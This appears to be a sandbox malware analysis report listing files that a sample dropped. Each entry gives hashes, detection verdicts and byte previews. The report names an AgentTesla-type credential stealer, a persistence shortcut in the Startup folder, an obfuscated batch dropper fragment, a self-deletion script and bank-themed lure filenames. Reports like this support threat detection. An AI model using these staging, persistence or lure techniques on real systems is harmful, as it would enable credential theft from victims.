                                                                                                              SHA-512:48D46515E5CD50B0FC80EBB8437F61CC9FA5FE3102597B0CDC9653D363D71B639FA896A00286DEBBDEC19A7C8A27A66BA7E7B54C73563BB089D9A0BE4D9ACE30
                                                                                                              Malicious:false
                                                                                                              Preview:45..

                                                                                                              C:\Users\Public\Libraries\Wisrysxl

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1921890
                                                                                                              Entropy (8bit):7.398856770638502
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                              MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                              SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                              SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                              SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                              Malicious:true
                                                                                                              Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

                                                                                                              C:\Users\Public\Libraries\Wisrysxl.PIF

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1081856
                                                                                                              Entropy (8bit):6.9272903664814445
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                              MD5:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              SHA1:97340CA203A1207E492135D580C6860A724A227F
                                                                                                              SHA-256:F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
                                                                                                              SHA-512:6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                              C:\Users\Public\Libraries\lxsyrsiW.cmd

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):62357
                                                                                                              Entropy (8bit):4.705712327109906
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                              Malicious:false
                                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                              C:\Users\Public\Libraries\lxsyrsiW.pif

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):68096
                                                                                                              Entropy (8bit):6.328046551801531
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                              MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                              SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                              SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                              SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                              • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                              • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse
                                                                                                              • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                              • Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse
                                                                                                              • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                              • Filename: E_dekont.cmd, Detection: malicious, Browse
                                                                                                              • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
                                                                                                              • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                              C:\Users\Public\Wisrysxl.url

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):104
                                                                                                              Entropy (8bit):5.094576921115185
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxH+95ov:HRYFVmTWDyzPtZEx22v
                                                                                                              MD5:E2B7BE259ACDD6088895958CAB9567B8
                                                                                                              SHA1:BACD585BD1D363629B1B8C10285711313D1D51E5
                                                                                                              SHA-256:1EC3D3D43F061F2E990D0B59F4B8F798C90D81F30F5B5363FE2F6B88386F1DB9
                                                                                                              SHA-512:A54A88368C805B997E266C8EA4C7417B0AAC30A0A5A0E7FF4885009F490FCC4D982554CFF5205F8F1D140D6260D3D346380199128AEF3F0239C1F193CF3F1316
                                                                                                              Malicious:true
                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=957720..HotKey=80..

                                                                                                              C:\Users\Public\alpha.pif

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):236544
                                                                                                              Entropy (8bit):6.4416694948877025
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):410
                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):410
                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2232
                                                                                                              Entropy (8bit):5.379460230152629
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:fLHyIFKL3IZ2KRH9Ougos
                                                                                                              MD5:28F8623974ADE7FF0B49C3406E91E372
                                                                                                              SHA1:739F9DD671D9788B182A7A2D506A3919CA1C6098
                                                                                                              SHA-256:3CFE86C229FC35A9886CD7D5A46DFF98C0389C9294C35AA82FA4F907A72E8269
                                                                                                              SHA-512:93E2DC72E86EE4006A29687F845FA384C4B3DF320191C77E64CF3EF751D641BB51328F5F36F31FF781F07233A4D3BF24DBC57CCE9B943756257D0A1E0912AB32
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2b1iobea.ydi.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kts4nwv.4co.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cknhcxif.2ku.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yodbgdus.ps3.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\neworigin.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):250368
                                                                                                              Entropy (8bit):5.008874766930935
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                              MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                              SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                              SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................

                                                                                                              C:\Users\user\AppData\Local\Temp\server_BTC.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):231936
                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                              C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):167
                                                                                                              Entropy (8bit):5.005860970615645
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:mKDDCMNvFbuov3DN+E2J5xAIJWAdEFKDwU1hGDN+E2J5xAInTRIJcLjIBQty:hWKdbuoLN723fJWAawDNeN723fT36
                                                                                                              MD5:70873B877515E74B4728AC25263D6983
                                                                                                              SHA1:A7489FB4E2ABC3CE703D1D545E3A0280616225C2
                                                                                                              SHA-256:45B68DB1F156AB959A987BCF26ACA9787E34E59E0FBD5162B5131FFAF25B7B29
                                                                                                              SHA-512:A77D8A7CF546EF30FD5AB6C770B65EC4FDA44D6EDB93D731AD556DA8EA24722A42E07F195102FE27A5A732B12334A02640DD2C8B9499A95711BB24CDF995E93C
                                                                                                              Malicious:false
                                                                                                              Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFB9.tmp.cmd" /f /q..

                                                                                                              C:\Users\user\AppData\Roaming\659475502e6d002.bin

                                                                                                              Download File
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12320
                                                                                                              Entropy (8bit):7.983344573018528
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:GNtbe3n0t2AktAipGzf3QcXkl8SnAn4vNwd8X+mq7d+R2op9PGUCxFsfkynK4vFx:GNA3lLazVXkoANKJKp9udFszD2zC0YNr
                                                                                                              MD5:D52928BEB7E3EF0E1BA4B2B5127D7C2D
                                                                                                              SHA1:75AB6D5415569CFAD2113B1C2C69396E29F732CC
                                                                                                              SHA-256:52E1620C84EBFD4EA6BD5F8F7AA4A6E3261261C67FED9C4F09F0415A6AC6616B
                                                                                                              SHA-512:35D5CECD3FDAC3D4078E0D67C8D75B5757F34B5DD8AE94168953CB1E000CAA2FA72E386A64ED4FBA67FDBD5D2BEA70BF92BF1425E4163C1EE92F2C5AE305F0FA
                                                                                                              Malicious:false
                                                                                                              Preview:.N..h...m.^.,..m5g..C.mBg6.2c"^.Kt.YbkS.d.)...f..c...{.9...YF...[n.p.j9v...sC.@..c.....!..w|..X..#..s..iy?.g.(...9..|.B^..`D.Ml..dc,0.7.|S.<R.#>a.....8.*{.L.....t|..I...V.$g..ZH..G.}j!l.r..+JTx.8.:....XX.....Q......r.6.......9..+...b..^.#9.S...;..k/@vB..|..f..lnq.......4.3V..+o9i...wd5..[8../N..%.-....J....H/......io.k..>....v....{..q.&..%m..../..`0#...=....P.......H.M}....g...3....J.fe..s.3..e.........+...Ja........j.jP....^..ouRf.W..}....!f.T.Y.e..|.v.v..%.."cT..C....Zm...)..TTa.....2....`.h.t..."_..h.........I.....oG3. .*..M.)....he.........,..H......+...MclK.@.~].TjJ.5....}$.e..p.H.P....M.#K...)...C:..&.....a....M.J./......R.2|..X+]Y2.....g.3H8.....GE.....U.l....z].]..=.?..9..\....;.9rI,}._y.`).t|...|!...._N.-...$p._......;WI...`g..<W....+Q.r.....W.;.U..v*.$.(.2..l.*...H'..2.f.]~..h-#.a.V.*C..8......~.&.5.@.q.....W.@.....F.II...jg....5D.y)z ".t+x7...9.......-2.(........L..5..8.![...L~.)..C.T.j^v.~~T|..3&.p@.'c..R@...;pm..Q~..5

                                                                                                              C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):231936
                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 12 13:55:09 2024, mtime=Tue Nov 12 13:55:09 2024, atime=Tue Nov 12 13:55:07 2024, length=231936, window=
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1800
                                                                                                              Entropy (8bit):3.5174539760867622
                                                                                                              Encrypted:false
